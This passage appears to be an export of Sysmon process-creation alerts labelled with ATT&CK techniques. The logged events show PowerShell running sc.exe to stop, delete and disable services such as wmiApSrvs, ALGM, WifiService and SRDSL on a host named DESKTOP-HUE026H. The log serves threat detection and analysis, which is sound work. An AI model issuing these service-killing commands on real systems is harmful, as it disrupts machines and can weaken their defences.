12:52:04.288"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-00104a852e00}"",""processId"":""1528"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApServs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.156",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.231 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-001065822e00} +ProcessId: 4508 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApSrvs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.234025500Z"",""eventRecordID"":""3476"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.231\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-001065822e00}\r\nProcessId: 4508\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.231"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-001065822e00}"",""processId"":""4508"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApSrvs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.130",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.195 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00107e802e00} +ProcessId: 8064 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.197468900Z"",""eventRecordID"":""3474"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.195\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00107e802e00}\r\nProcessId: 8064\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.195"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-00107e802e00}"",""processId"":""8064"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.109",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.175 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010847f2e00} +ProcessId: 7604 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ALGM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.186571900Z"",""eventRecordID"":""3473"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.175\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010847f2e00}\r\nProcessId: 7604\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.175"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010847f2e00}"",""processId"":""7604"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.063",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.112 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010387c2e00} +ProcessId: 3592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WifiService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WifiService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.133597300Z"",""eventRecordID"":""3470"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.112\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010387c2e00}\r\nProcessId: 3592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WifiService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.112"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010387c2e00}"",""processId"":""3592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WifiService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.017",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.065 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010c0792e00} +ProcessId: 7088 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SRDSL +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.068917000Z"",""eventRecordID"":""3467"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.065\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010c0792e00}\r\nProcessId: 7088\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.065"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010c0792e00}"",""processId"":""7088"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SRDSL"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:31.991",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.046 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010f3782e00} +ProcessId: 2360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config SRDSL Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config SRDSL Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.048452700Z"",""eventRecordID"":""3466"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.046\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010f3782e00}\r\nProcessId: 2360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config SRDSL Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.046"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010f3782e00}"",""processId"":""2360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config SRDSL Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 